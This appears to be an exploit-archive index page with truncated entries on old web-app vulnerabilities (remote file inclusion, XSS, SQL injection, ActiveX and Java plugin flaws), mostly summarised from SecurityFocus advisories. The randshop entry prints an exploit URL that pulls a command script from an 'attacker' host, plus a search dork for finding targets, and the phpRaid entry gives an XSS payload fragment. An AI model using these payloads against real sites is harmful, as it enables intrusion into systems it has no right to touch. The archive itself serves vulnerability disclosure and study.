randshop <= 1.1.x (index.php) Remote File Inclusion Vulnerability

Title : randshop = 1.1.x Remote File Inclusion Vulnerability - URL : http://www.randshop.com/ - Author :Saudi Hackrz - contact : Saudi.UnixatHotmail.com - dork : "software 2004-2005 by randshop" - exploit : http://target/path/index.php?dateiPfad=http://attacker/cmd.txt?&cmd=ls - greatz : SnIpEr.S...

phpRaidXSS.txt

phpRaid "view.php" XSS Vulnerability Script : phpRaid Script Website : http://www.spiffyjr.com/ Version : phpRaid v2.9.5 This Xss Works On phpRaid Exploit ; 1- Http://www.example.com/phpRaid/view.php?alert'Xss%20Vulnerability'; 2-...

mybb111.txt

---------------------------------- Foud By: Breeeeh & CrAzY CrAcKeR Site: www.alshmokh.com Email:[email protected] ---------------------------------- $query = $db-query"SELECT FROM ".TABLEPREFIX."forums f WHERE 1=1 $forumlist"; $comma = " - "; while$forum = $db-fetcharray$query $title .=...

PluggedOut Nexus SQL injection

PluggedOut Nexus SQL injection Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each others interests, and communicate with one another either through a private messaging system, or via chat requests and forums...

OnePlug CMS - servicesdetails.asp?Service_ID SQL Injection

OnePlug CMS - servicesdetails.asp?ServiceID SQL Injection source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL...

Libertas Enterprise CMS 3.0 - index.php Cross-Site Scripting

Libertas Enterprise CMS 3.0 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/15950/info Enterprise CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...

A-FAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection

source: https://www.securityfocus.com/bid/15741/info A-FAQ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access ...

PHPYellowTM 5.33 - 'print_me.php?ckey' SQL Injection

source: https://www.securityfocus.com/bid/15700/info phpYellowTM is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise ...

Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass

source: https://www.securityfocus.com/bid/11726/info A vulnerability is reported to exist in the access controls of the Java to JavaScript data exchange within web browsers that employ the Sun Java Plug-in. Reports indicate that it is possible for a malicious website that contains JavaScript code...

IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method

source: https://www.securityfocus.com/bid/10561/info It is reported that the IBM acpRunner ActiveX control contains dangerous methods that may result in a remote compromise of a system on which the ActiveX control is installed. These methods may be accessed by a malicious website and may result i...